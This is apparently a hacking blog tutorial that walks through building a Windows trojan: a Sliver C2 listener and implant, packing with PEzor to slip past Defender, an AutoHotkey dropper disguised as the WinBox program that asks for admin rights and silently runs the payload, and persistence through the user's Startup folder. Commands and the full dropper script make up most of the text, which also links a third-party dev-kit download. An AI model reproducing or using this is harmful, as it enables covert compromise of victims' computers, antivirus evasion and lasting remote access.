So, let's talk a bit about persistence in Windows and Sliver, and a bit about encryption and AHK. So, we should be in for a fun nigth :)
First, read PEzor and Sliver C2 to get up to speed, and let's have some fun..
First, get PEzor and Sliver setup and working. If you want to build the AHK social engineering files, you need a Windows workstation and Autohotkey development kit setup, but AHK is optional.
The Autohotkey dev kit can be downloaded here https://downloads.blackdragon.se/AHK_Dev_Tools.zip
First things first, start sliver-server, and generate the mtls listener, like so.
mtls -L YOUR-IP -l your_listening_port
# For ip 10.0.0.52 and port 443
mtls -L 10.0.0.52 -l 443
# Confirm with the jobs command
sliver (SMALL_UNDERSTANDING) > jobs
ID Name Protocol Port
==== ====== ========== ======
1 mtls tcp 443
[server] sliver >
Next, we need a payload for that listener, for that we use the generate command in sliver
# Generate sliver imlant for the listeners IP and PORT
# Again, here it's for 10.0.0.52 and port 443
[server] sliver > generate -e -m 10.0.0.52:443 -o windowsSo, when we're done with that, and have a Sliver implant, time to get the fun stuff going. We're going to encrypt and pack it with PEzor, so start PEzor with -h, to see the help file.
The command I used was this.
PEzor.sh -64 -sgn -unhook -antidebug -text -sleep=120 /path/to/payload.exeIf all worked out, we have a file called payload.exe.packed.exe and that's our encrypted loader. Try to load it to a Windows desktop and scan it with defender, it should pass with no problem.
Now, for the social engineering part. See, the problem is that our encrypted fle doesn't really do anything, it shows no output, so we need something to show the user. If you have Autohotkey Dev Kit, and AHK-Studio setup, open a new project, and paste this in.
cat -n winbox_loader.ahk
1 #NoEnv ; Recommended for performance and compatibility with future AutoHotkey releases.
2 ; #Warn ; Enable warnings to assist with detecting common errors.
3 ;@Ahk2Exe-SetMainIcon %A_ScriptDir%\winbox.ico
4 SendMode Input ; Recommended for new scripts due to its superior speed and reliability.
5 SetWorkingDir %A_ScriptDir% ; Ensures a consistent starting directory.
6 FileInstall, winbox.exe , c:\%TEMP%\winbox.exe, 1
7 FileInstall, freckle_packed.exe, c:\%TEMP%\freckle_packed.exe, 1
8 ;A random variable to help obfuscate code
9 MyRandomShit = just some6493469 random96763496 garble to create entropy
10 if A_IsAdmin
11 {
12 Run, "c:\%TEMP%\winbox.exe"
13 Run, "c:\%temp%\freckle_packed.exe"
14 }
15 else
16 {
17 MsgBox,," Run as admin, This file needs Admin - Right-click and choose run as administrator ",
18 }
Now, let's go through it a bit. In line 3, we set a AHK-Compiler directive to set a main icon. Since i'm using the winbox software, I found the winbox icon, ran it through a png to ico converter online, and saved it into the project folder, alongside my ahk script, along with my payload.packed.exe file and the winbox program.
So, line 6 and 7 should be changed to match your main program name and payload, and change the comments in line 8 and 9, to change the file a bit.
Now, in line 12 and 13, we define where what we want to run, and from where, but if you just adjust winbox.exe and freckle_pcked.exe, to your own values, and then ry to go to main, and choose compile, and see if it builds in AHK-Studio, it should.
For a quick test, simply just run the packed.exe file, and see if you get a shell back in sliver, you should, and switch to it, using theĀ use command.
Now, if you're in a Sliver session, the first thing we need to do, is setup persistence. Since we have a payload file, we simply navigate to c:\Users\username\appdata\Roaming\Microsoft\Windows.
Now, we pause for a bit. Try to run an ls command in Sliver shell, and you should see a folder called "Start Menu". The problem is that Slivers mv command doesn't do well with spaces, so we navgate to one directory below, and step one forward, like this.
[server] sliver > cd "Start Menu"From here, we jump into "Programmer" / "Programs" and "Start" / "Startup" and move our payload from it's current position into it's final place. But why this ? Because everything in this folder is run at login, so if we loose our shell, we get it back the next time the user logs in :)
Now, a bit about the Sliver commands. The problem is that, when we're using encrypted runners, some things break, so we only have the following commands to work with in sliver.
cat Dump file to stdout
cd Change directory
close Close an interactive session without killing the remote process
download Download a file
# execute Execute a program on the remote system
# execute-shellcode Executes the given shellcode in the sliver process
extensions Manage extensions
getgid Get session process GID
getpid Get session pid
getuid Get session process UID
ifconfig View network interface configurations
info Get info about session
* interactive Task a beacon to open an interactive session (Beacon only)
* kill Kill a session
ls List current directory
mkdir Make a directory
* msf Execute an MSF payload in the current process
* msf-inject Inject an MSF payload into a process
mv Move or rename a file
netstat Print network connection information
* ping Send round trip message to implant (does not use ICMP)
* pivots List pivots for active session
* portfwd In-band TCP port forwarding
procdump Dump process memory
ps List remote processes
pwd Print working directory
reconfig Reconfigure the active beacon/session
rename Rename the active beacon/session
rm Remove a file or directory
screenshot Take a screenshot
# shell Start an interactive shell
* sideload Load and execute a shared object (shared library/DLL) in a remote process
* socks5 In-band SOCKS5 Proxy
* ssh Run a SSH command on a remote host
* terminate Terminate a process on the remote system
upload Upload a file
whoami Get session user execution context
# Breaks the sliver session to the target - DONT USE !!
* Not yet testet - more to follow :)So, there's some stuff missing, but I'm workin on it. I know Sliver should be able to use "stagers" / "staging shellcode", but this hasn't been testet out so much I can do a piece on i, but im working on it :)
Also note, we don't have shell command, it breaks the session AND get us caught by AV, so we'll have to manage without it I guess ;)
But, what could be done from here on ?. We'll some custom written persistence malware to play with AV, set up folders so AV won't scan them, and download a real session and tools, for elevating rights into the system would be the next step, and some more looking into standard writable folder locations, but that's for another piece :)
Much Happy Hacking :)